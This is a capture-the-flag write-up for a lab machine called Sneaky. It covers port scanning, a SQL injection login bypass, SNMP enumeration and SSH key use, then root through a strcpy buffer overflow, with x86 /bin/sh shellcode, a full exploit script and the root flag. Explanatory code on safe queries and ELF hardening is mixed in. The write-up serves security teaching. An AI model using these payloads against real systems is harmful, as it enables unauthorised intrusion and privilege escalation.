Masscan + Nmap
$ masscan -p1-65535,U:1-65535 `IP` --rate=10000 -e tun0 | tee masscan.out
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.20
Discovered open port 80/tcp on 10.10.10.20
Pass those ports to nmap:
ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
nmap -sVCTU --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: fcf2da02d0831859
| snmpEngineBoots: 8
|_ snmpEngineTime: 3m31s
| snmp-netstat:
| TCP 127.0.0.1:3306 0.0.0.0:0
|_ UDP 0.0.0.0:161 *:*
| snmp-processes:
| 1:
| Name: init
| Path: /sbin/init
| 407:
| Name: upstart-udev-br
| Path: upstart-udev-bridge
| Params: --daemon
| 411:
| Name: systemd-udevd
| Path: /lib/systemd/systemd-udevd
| Params: --daemon
| 470:
| Name: dbus-daemon
| Path: dbus-daemon
| Params: --system --fork
| 488:
| Name: systemd-logind
| Path: /lib/systemd/systemd-logind
| 492:
| Name: rsyslogd
| Path: rsyslogd
| 514:
| Name: upstart-file-br
| Path: upstart-file-bridge
| Params: --daemon
| 803:
| Name: upstart-socket-
| Path: upstart-socket-bridge
| Params: --daemon
| 947:
| Name: getty
| Path: /sbin/getty
| Params: -8 38400 tty4
| 992:
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
| 995:
| Name: cron
| Path: cron
| 996:
| Name: acpid
| Path: acpid
| Params: -c /etc/acpi/events -s /var/run/acpid.socket
| 1059:
| Name: mysqld
| Path: /usr/sbin/mysqld
| 1072:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /var/run/snmpd.pid
Service Info: Host: Sneaky
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.20 seconds
HTTP
Directory bruteforcing:
ffuf -u http://10.10.10.20/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -fc 401,403,405 -e .txt,.php,.zip,.bak,.html
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.20/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Extensions : .txt .php .zip .bak .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 401,403,405
________________________________________________
index.html [Status: 200, Size: 183, Words: 10, Lines: 12]
dev [Status: 301, Size: 307, Words: 20, Lines: 10]
. [Status: 200, Size: 183, Words: 10, Lines: 12]
:: Progress: [378522/378522] :: Job [1/1] :: 431 req/sec :: Duration: [0:14:29] :: Errors: 0 ::
Visiting /dev gives a login form. I tried common usernames and passwords, which didn’t work. Let’s try SQL injection: I tried the payload ' or 1=1-- - in the password field and it logged in! The page has this content:
DevWebsite Login
name: admin
name: thrasivoulos
My Key
Noone is ever gonna find this key :P
And the My Key link points to /dev/sshkeyforadministratordifficulttimes, which contains the private SSH key for thrasivoulos.
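As an added example (not code from the writeup), here is why that payload bypasses the form: a login query built by string concatenation next to the parameterised version. The table, column names and stored passwords are constructed placeholders standing in for whatever the /dev backend actually uses.

```python
#!/usr/bin/env python3
"""The ' or 1=1-- - bypass against a concatenated query, and the bound-parameter fix."""
import sqlite3

PAYLOAD = "' or 1=1-- -"   # the password-field payload used in the writeup

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the /dev login backend (names assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "placeholder-admin-pw"), ("thrasivoulos", "placeholder-pw")])
    return db

def login_vulnerable(db: sqlite3.Connection, user: str, password: str):
    """Builds SQL by string formatting: the quote in PAYLOAD closes the literal early,
    'or 1=1' makes the WHERE clause true for every row, and '-- -' comments out the rest."""
    sql = f"SELECT name FROM users WHERE name='{user}' AND password='{password}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db: sqlite3.Connection, user: str, password: str):
    """Bound parameters: the driver passes the input as data, so it can never
    change the query's structure. (Real code would also hash the stored password.)"""
    row = db.execute("SELECT name FROM users WHERE name=? AND password=?",
                     (user, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print("concatenated: ", login_vulnerable(db, "admin", PAYLOAD))   # admin
    print("parameterised:", login_fixed(db, "admin", PAYLOAD))        # None
```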
SNMP
Simple Network Management Protocol is a protocol used for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Brute forcing the community string with onesixtyone:
$ onesixtyone -c /opt/metasploit-framework/embedded/framework/data/wordlists/snmp_default_pass.txt `IP`
Scanning 1 hosts, 123 communities
10.10.10.20 [public] Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
Dumping SNMP-data:
$ snmp-check -p 161 `IP` -c public -d -v 3
[*] System information:
Host IP address : 10.10.10.20
Hostname : Sneaky
Description : Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
Contact : root
Location : Unknown
Uptime snmp : 00:18:48.47
Uptime system : 00:18:43.51
System date : 2021-7-21 16:29:17.0
[*] Processes:
Id Status Name Path Parameters
1 runnable init /sbin/init
992 runnable sshd /usr/sbin/sshd -D
1059 runnable mysqld /usr/sbin/mysqld
[*] Software components:
Index Name
0 accountsservice-0.6.35-0ubuntu7.3
1 acpid-1:2.0.21-1ubuntu2
8 apport-symptoms-0.20
9 apt-1.0.1ubuntu2.17
10 apt-transport-https-1.0.1ubuntu2.17
383 passwd-1:4.1.5.1-1ubuntu9.4
384 patch-2.7.1-4ubuntu2.3
392 php5-json-1.3.2-2build1
456 ssl-cert-1.0.33
457 strace-4.8-1ubuntu5
458 sudo-1.8.9p5-1ubuntu1.3
467 tcpdump-4.9.0-1ubuntu1~ubuntu14.04.1
468 telnet-0.17-36build2
469 time-1.7-24
470 tmux-1.8-5
471 tzdata-2016j-0ubuntu0.14.04
476 ucf-3.0027+nmu1
477 udev-204-5ubuntu20.24
478 ufw-0.34~rc-0ubuntu2
487 vim-common-2:7.4.052-1ubuntu3.1
488 vim-runtime-2:7.4.052-1ubuntu3.1
489 vim-tiny-2:7.4.052-1ubuntu3.1
490 w3m-0.5.3-15ubuntu0.1
491 wget-1.15-1ubuntu1.14.04.2
I can see MySQL running in the background.
We can even use snmpwalk for more data with snmpwalk -c public -v2c IP. But that prints raw OID-tree output, which is hard to read. To fix that, run apt install snmp-mibs-downloader, then edit /etc/snmp/snmp.conf and comment out the mibs line.
$ snmpwalk -c public -v2c `IP` > snmpwalk-v2c
Finding IPV6
After checking out the data from snmp, I do get some IPv6 addresses:
$ cat snmpwalk-v2c | grep -i ipv6 | grep 'fe:80\|de:ad' | awk -F '"' '{print $2 }'| sort -u
de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:44:ec
fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:44:ec
fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:83:d8
But the formatting of the IPv6 addresses is still wrong. They should be:
dead:beef:0000:0000:0250:56ff:feb9:44ec
fe80:0000:0000:0000:0250:56ff:feb9:44ec
fe80:0000:0000:0000:0250:56ff:feb9:83d8
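As an added example (not the writeup's own code), here is that conversion done programmatically: snmpwalk prints each IPv6 address as 16 colon-separated bytes, so the parser regroups them and lets the ipaddress module produce both the exploded form shown above and the compressed form nmap and ssh accept. The SAMPLE lines and their OID names are constructed; only the three addresses come from the writeup.

```python
#!/usr/bin/env python3
"""Turn the byte-per-field IPv6 strings that snmpwalk prints into normal notation."""
import ipaddress
import re

# Constructed sample lines, modelled on the snmpwalk -v2c output filtered above;
# the three addresses are the ones the writeup recovered, the OID names are assumed.
SAMPLE = """\
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:44:ec" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:44:ec" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:83:d8" = INTEGER: 3
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.20" = INTEGER: 2
"""

def snmp_bytes_to_ipv6(field: str) -> ipaddress.IPv6Address:
    """'de:ad:be:ef:...' (16 two-digit hex bytes) -> IPv6Address."""
    parts = field.split(":")
    if len(parts) != 16 or not all(len(p) == 2 for p in parts):
        raise ValueError(f"expected 16 colon-separated bytes, got {field!r}")
    return ipaddress.IPv6Address(bytes(int(p, 16) for p in parts))

def extract_ipv6(snmpwalk_output: str) -> list:
    """Unique IPv6 addresses from snmpwalk text, in compressed (RFC 5952) form."""
    found = set()
    for line in snmpwalk_output.splitlines():
        m = re.search(r'ipv6\."([0-9a-fA-F:]+)"', line)
        if m:
            found.add(snmp_bytes_to_ipv6(m.group(1)))
    return [a.compressed for a in sorted(found)]

def routable(addr: str) -> bool:
    """Link-local (fe80::/10) addresses are never routed and need a %interface
    zone ID even on the same link; the dead:beef address is the one to use."""
    return not ipaddress.IPv6Address(addr).is_link_local

if __name__ == "__main__":
    for a in extract_ipv6(SAMPLE):
        tag = "" if routable(a) else "(link-local, needs %zone)"
        print(ipaddress.IPv6Address(a).exploded, "->", a, tag)
```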
Running nmap on all the IPv6 addresses for port 22:
$ for i in $(cat ipv6); do nmap -6 $i -Pn -n -p 22 ; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 17:05 IST
Nmap scan report for dead:beef::250:56ff:feb9:44ec
Host is up (0.088s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (0 hosts up) scanned in 1.53 seconds
$ ssh -i ./sshkeyforadministratordifficulttimes thrasivoulos@dead:beef::250:56ff:feb9:44ec
The authenticity of host 'dead:beef::250:56ff:feb9:44ec (dead:beef::250:56ff:feb9:44ec)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'dead:beef::250:56ff:feb9:44ec' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed Jul 21 16:10:30 EEST 2021
System load: 0.0 Memory usage: 4% Processes: 176
Usage of /: 9.9% of 18.58GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$
Privesc using BOF
Checking for SUID permissions, I find /usr/local/bin/chal:
$ find / -type f -perm -4000 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/usr/local/bin/chal
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/at
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
This binary is vulnerable to a buffer overflow:
thrasivoulos@Sneaky:~$ /usr/local/bin/chal
Segmentation fault (core dumped)
thrasivoulos@Sneaky:~$ strings /usr/local/bin/chal | grep strcpy
strcpy
strcpy@@GLIBC_2.0
Checking Protections
ASLR is turned off:
thrasivoulos@Sneaky:~$ cat /proc/sys/kernel/randomize_va_space
0
No protections enabled:
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
gdb-peda$
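The checksec output above is derived from the ELF's own headers. As an added example (not the writeup's code, and not gdb-peda's), the following reads NX, PIE and RELRO straight from the program headers and is exercised against a constructed header-only ELF32 image that mirrors chal's profile, next to a hardened one. Canary and FORTIFY detection need the symbol table and are left out.

```python
#!/usr/bin/env python3
"""Read NX, PIE and RELRO straight from ELF program headers, like checksec does."""
import struct

PT_GNU_STACK = 0x6474E551   # its p_flags decide whether the stack is executable
PT_GNU_RELRO = 0x6474E552   # present when the linker emitted a read-only-after-reloc region
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3

def elf_protections(data: bytes) -> dict:
    """NX/PIE/RELRO from the headers only. Canary and FORTIFY need the symbol
    table (__stack_chk_fail, *_chk imports) and are not covered here."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    (e_type,) = struct.unpack_from("<H", data, 16)
    if is64:
        (e_phoff,) = struct.unpack_from("<Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    else:
        (e_phoff,) = struct.unpack_from("<I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx, relro = False, "none"   # no PT_GNU_STACK at all also means an executable stack
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, off)
        # p_flags follows p_type in Elf64_Phdr but sits at +24 in Elf32_Phdr
        (p_flags,) = struct.unpack_from("<I", data, off + (4 if is64 else 24))
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = "partial"   # "full" would additionally need DT_BIND_NOW in PT_DYNAMIC
    return {"NX": nx, "PIE": e_type == ET_DYN, "RELRO": relro}

def build_elf32(e_type: int, phdrs: list) -> bytes:
    """Constructed header-only ELF32 image for testing; not a runnable binary."""
    ident = b"\x7fELF\x01\x01\x01" + b"\0" * 9          # 32-bit, little-endian, v1
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, e_type, 3, 1, 0x8048320,
                       52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    body = b"".join(struct.pack("<8I", t, 0, 0, 0, 0, 0, f, 0x10) for t, f in phdrs)
    return ehdr + body

# Same profile the writeup's checksec shows for chal: RWX stack, non-PIE, partial RELRO
WEAK_ELF = build_elf32(ET_EXEC, [(PT_GNU_STACK, 0x7), (PT_GNU_RELRO, 0x4)])
# The same program built with -pie -Wl,-z,noexecstack: NX on, PIE on
HARD_ELF = build_elf32(ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])

if __name__ == "__main__":
    print("chal-like:", elf_protections(WEAK_ELF))
    print("hardened :", elf_protections(HARD_ELF))
```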
Enumerating chal
Listing functions:
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x080482b4 _init
0x080482f0 strcpy@plt
0x08048300 __gmon_start__@plt
0x08048310 __libc_start_main@plt
0x08048320 _start
0x08048350 __x86.get_pc_thunk.bx
0x08048360 deregister_tm_clones
0x08048390 register_tm_clones
0x080483d0 __do_global_dtors_aux
0x080483f0 frame_dummy
0x0804841d main
0x08048450 __libc_csu_init
0x080484c0 __libc_csu_fini
0x080484c4 _fini
Disassembling main; nothing fancy.
gdb-peda$ disass main
Dump of assembler code for function main:
0x0804841d <+0>: push ebp
0x0804841e <+1>: mov ebp,esp
0x08048420 <+3>: and esp,0xfffffff0
0x08048423 <+6>: sub esp,0x170
0x08048429 <+12>: mov eax,DWORD PTR [ebp+0xc]
0x0804842c <+15>: add eax,0x4
0x0804842f <+18>: mov eax,DWORD PTR [eax]
0x08048431 <+20>: mov DWORD PTR [esp+0x4],eax
0x08048435 <+24>: lea eax,[esp+0x12]
0x08048439 <+28>: mov DWORD PTR [esp],eax
0x0804843c <+31>: call 0x80482f0 <strcpy@plt>
0x08048441 <+36>: mov eax,0x0
0x08048446 <+41>: leave
0x08048447 <+42>: ret
End of assembler dump.
This binary copies the given command-line argument into a stack buffer with strcpy.
Finding offset
gdb-peda$ pattern create 500
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
Starting program: /root/HTB/Sneaky/privesc/chal 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd400 ("sgAs6A")
EDX: 0xffffd030 ("sgAs6A")
ESI: 0xf7fa1000 --> 0x1e4d6c
EDI: 0xf7fa1000 --> 0x1e4d6c
EBP: 0x41712541 ('A%qA')
ESP: 0xffffcfb0 ("rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A")
EIP: 0x25415525 ('%UA%')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
Stopped reason: SIGSEGV
0x25415525 in ?? ()
The offset for EIP comes out as 362.
gdb-peda$ pattern search $eip
Registers contain pattern buffer:
EBP+0 found at offset: 358
EIP+0 found at offset: 362
Confirming the offset
Sending 362 A’s and 4 B’s and checking whether the B’s end up in EIP:
gdb-peda$ r $(python3 -c 'print("A"*362 + "B"*4)')
Starting program: /root/HTB/Sneaky/privesc/chal $(python3 -c 'print("A"*362 + "B"*4)')
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd400 ("AABBBB")
EDX: 0xffffd02a ("AABBBB")
ESI: 0xf7fa1000 --> 0x1e4d6c
EDI: 0xf7fa1000 --> 0x1e4d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd030 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
Getting /bin/sh shellcode
Getting /bin/sh shellcode for x86, as it’s a 32-bit binary. Googling “/bin/sh shellcode x86” gives a 28-byte one from packetstorm.
Getting eip address
I’ll send 400 bytes of B’s and see where in the stack they end up.
(gdb) r $(python3 -c 'print("B"*400)')
Starting program: /usr/local/bin/chal $(python3 -c 'print("B"*400)')
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
Running x/100x $esp shows only a few B’s, far fewer than the 400 we sent. Let’s look at the 400 bytes below esp:
(gdb) x/100x $esp-400
0xbffff3b0: 0xbffff3d2 0x00000000 0x00000000 0x08048441
0xbffff3c0: 0xbffff3d2 0xbffff712 0x0804821d 0xb7fffc24
0xbffff3d0: 0x424218fc 0x42424242 0x42424242 0x42424242
0xbffff3e0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff3f0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff400: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff410: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff420: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff430: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff440: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff450: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff460: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff470: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff480: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff490: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff4a0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff4b0: 0x42424242 0x42424242 0x42424242 0x42424242
We can use any of these addresses that show 0x42 (B), since we’ll fill the rest of the stack with NOPs. I chose 0xbffff3f0 for EIP.
Exploitation
What I’m trying to do here is place my shellcode on the stack, then point EIP at exactly that address or one a bit above it. (It doesn’t matter if the address is a bit off; execution slides through the NOPs and into the shellcode.) The payload looks like this: NOPS + SHELLCODE + EIP
#!/usr/bin/python3
import sys
offset = 362
shellcode = b"\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
nopsled=b"\x90" *(offset - len(shellcode))
#eip 0xbffff3f0
eip=b"\xf0\xf3\xff\xbf"
payload = nopsled + shellcode + eip
sys.stdout.buffer.write(payload)
But this payload didn’t work, and that could be because of the long shellcode. I tried to check why it doesn’t work, and it seems like the nopsled breaks in between:
(gdb) x/100x $esp-300
0xbffff444: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff454: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff464: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff474: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff484: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff494: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4a4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4b4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4c4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4d4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4e4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff4f4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff504: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff514: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff524: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff534: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff544: 0x90909090 0x90909090 0x90909090 0x6850c031
0xbffff554: 0x68732f2f 0x69622f68 0x89e3896e 0xb0c289c1
0xbffff564: 0x3180cd0b 0x80cd40c0 0xbffff3f0 0x00000000
0xbffff574: 0xbffff604 0xbffff610 0xb7feccca 0x00000002
0xbffff584: 0xbffff604 0xbffff5a4 0x0804a014 0x0804821c
0xbffff594: 0xb7fce000 0x00000000 0x00000000 0x00000000
0xbffff5a4: 0x4c7a61ee 0x74e5e5fe 0x00000000 0x00000000
0xbffff5b4: 0x00000000 0x00000002 0x08048320 0x00000000
0xbffff5c4: 0xb7ff24c0 0xb7e3ba09 0xb7fff000 0x00000002
Searching for where the nopsled continues later on gave me 0xbffff74c:
(gdb) x/100x $esp+300
0xbffff69c: 0x00000020 0x00000005 0x00000009 0x00000007
0xbffff6ac: 0xb7fde000 0x00000008 0x00000000 0x00000009
0xbffff6bc: 0x08048320 0x0000000b 0x000003e8 0x0000000c
0xbffff6cc: 0x000003e8 0x0000000d 0x000003e8 0x0000000e
0xbffff6dc: 0x000003e8 0x00000017 0x00000001 0x00000019
0xbffff6ec: 0xbffff70b 0x0000001f 0xbfffffe8 0x0000000f
0xbffff6fc: 0xbffff71b 0x00000000 0x00000000 0xbf000000
0xbffff70c: 0x40d50dab 0x8448d9c8 0xbf0b9c5f 0x692fa6f5
0xbffff71c: 0x00363836 0x7273752f 0x636f6c2f 0x622f6c61
0xbffff72c: 0x632f6e69 0x006c6168 0x90909090 0x90909090
0xbffff73c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff74c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff75c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff76c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff77c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff78c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff79c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7ac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7bc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7cc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7dc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7ec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff7fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff80c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff81c: 0x90909090 0x90909090 0x90909090 0x90909090
Final exploit:
#!/usr/bin/python
import sys
offset = 362
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73"
shellcode+= b"\x68\x68\x2f\x62\x69\x6e\x89"
shellcode+= b"\xe3\x89\xc1\x89\xc2\xb0\x0b"
shellcode+= b"\xcd\x80\x31\xc0\x40\xcd\x80"
nopsled=b"\x90" *(offset - len(shellcode))
# eip 0xbffff74c (inside the second run of NOPs found above)
eip=b"\x4c\xf7\xff\xbf"
payload = nopsled + shellcode + eip
sys.stdout.buffer.write(payload)
Running the exploit:
thrasivoulos@Sneaky:~$ /usr/local/bin/chal `python3 script.py `
# whoami
root
# cat /root/root.txt
c5153d86cb175a9d5d9a5cc81736fb33